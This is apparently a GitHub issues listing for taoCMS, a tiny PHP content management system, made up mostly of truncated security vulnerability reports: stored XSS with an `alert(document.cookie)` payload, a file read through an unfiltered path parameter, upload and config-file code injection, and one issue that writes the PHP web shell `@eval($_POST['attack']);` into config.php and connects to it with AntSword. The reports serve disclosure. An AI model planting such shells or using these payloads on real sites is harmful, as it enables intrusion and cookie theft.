taocms icon indicating copy to clipboard operation
taocms copied to clipboard

taoCMS is an incredible tiny CMS( Content Management System) , writen in PHP and support MySQL/Sqlite as the database(MIT License)

Results 29 taocms issues
Sort by recently updated
recently updated
newest added

安装时显示mysqli类支持,但是安装时总是报sql语法错误,请问这个要求的环境是什么呢?

There is a stored cross-site scripting attack in "Friendly Links" (column administrator rights). details: https://github.com/Lejeremiah/taocms_xss/tree/main

This is the latest 3.0.2 version of taocms. Organize and utilize steps in two steps: Step1: Audit the source code "include/Model/Upload.php", line 33, the filename extension can be controlled by...

# analysis The location of the vulnerability is line 55 in \taocms\include\Model\File.php and we can see that the path parameter is passed directly to file_get_contents function without filtering ![20220110154029](https://raw.githubusercontent.com/destinypwd/images/main/20220110154029.png) ![20220110154107](https://raw.githubusercontent.com/destinypwd/images/main/20220110154107.png)...

1. We enter the management page, Go to website settings. ![image](https://user-images.githubusercontent.com/39737245/179381624-70b8a26f-29c1-4208-b373-fff0250394df.png) 2. Next, I want to inject php code by modifying these settings. From the config.php file we found that...

进入后台,编辑其他文件都权限不足导致保存失败 ![image](https://user-images.githubusercontent.com/58896696/160325045-81e953ab-873b-4947-a361-30b49619a6f8.png) 但是可以编辑config.php文件 ![image](https://user-images.githubusercontent.com/58896696/160325097-6708c69a-2eb3-4d92-a4a4-9a0b5025d1e7.png) 写一个一句话木马 @eval($_POST['attack']); ![image](https://user-images.githubusercontent.com/58896696/160325160-9e1ee76d-cd05-4493-a15e-0d54cac39ada.png) ![image](https://user-images.githubusercontent.com/58896696/160325189-91780a83-6e3d-464a-864f-8dec3798a9a7.png) 然后蚁剑连接 ![image](https://user-images.githubusercontent.com/58896696/160325315-cc30d289-691f-4969-acac-6d45c08159ed.png) ![image](https://user-images.githubusercontent.com/58896696/160325339-111f04ea-1340-4482-8c0a-342a778f4e14.png)

Hey there! I belong to an open source security research community, and a member (@metastor) has found an issue, but doesn’t know the best way to disclose it. If not...

- Payload: `alert(documnet.cookie)` Click on the left link module, and then click add ![image](https://user-images.githubusercontent.com/54017627/154786428-41124deb-b509-44b3-bb2f-83862ca41756.png) Enter our payload and click submit Found that payload has been executed Back to the home...

Click the Management column module and click add ![image](https://user-images.githubusercontent.com/54017627/154785531-67e093c9-8bcf-49dd-b15c-bd7fca5b258e.png) Enter our payload and click submit payload: `alert(document.cookie)` ![image](https://user-images.githubusercontent.com/54017627/154785598-f4e55002-4987-4dc0-96d2-12f10a181d51.png) Found that payload has been executed ![image](https://user-images.githubusercontent.com/54017627/154785615-8f18b06d-4efe-47f2-8c15-b5572b1bc921.png) Go back to the home...

We click on file management to go to the management location of the website and directory. ![image](https://user-images.githubusercontent.com/54017627/154784040-c571d842-3a18-49b2-a697-41858984921b.png) Click to edit the .htaccess file and add a line at the end,...